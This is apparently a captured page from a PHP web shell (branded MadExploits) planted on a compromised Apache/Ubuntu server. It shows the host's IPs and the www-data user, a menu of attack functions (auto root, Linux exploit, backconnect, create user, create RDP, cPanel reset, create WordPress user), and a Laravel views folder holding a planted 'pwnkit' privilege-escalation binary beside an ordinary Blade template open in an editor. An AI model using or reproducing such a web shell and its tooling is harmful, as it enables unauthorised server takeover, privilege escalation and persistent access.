Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.117.189.143
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
resources /
views /
layouts /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin.blade.php
6.03
KB
-rw-rw-r--
auth.blade.php
1.59
KB
-rw-rw-r--
base.blade.php
9.92
KB
-rw-rw-r--
empty.blade.php
769
B
-rw-rw-r--
googleda794cd9937527d01.html
43
B
-rw-r--r--
list.blade.php
15.84
KB
-rw-rw-r--
main.blade.php
4.29
KB
-rw-rw-r--
place.blade.php
2.98
KB
-rw-rw-r--
plain.blade.php
14.98
KB
-rw-rw-r--
plains.blade.php
16.46
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
reactbase.blade.php
7.96
KB
-rw-rw-r--
topnav.blade.php
13.34
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : empty.blade.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>Cravvings</title> @section('css') <link rel="stylesheet" href="/css/bootstrap.min.css"> <style> </style> @show <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-106575396-6'); </script> </head> <body> <div class="empty-wrapper"> @yield('content') </div> @section('javascript') @show </body> </html>
Close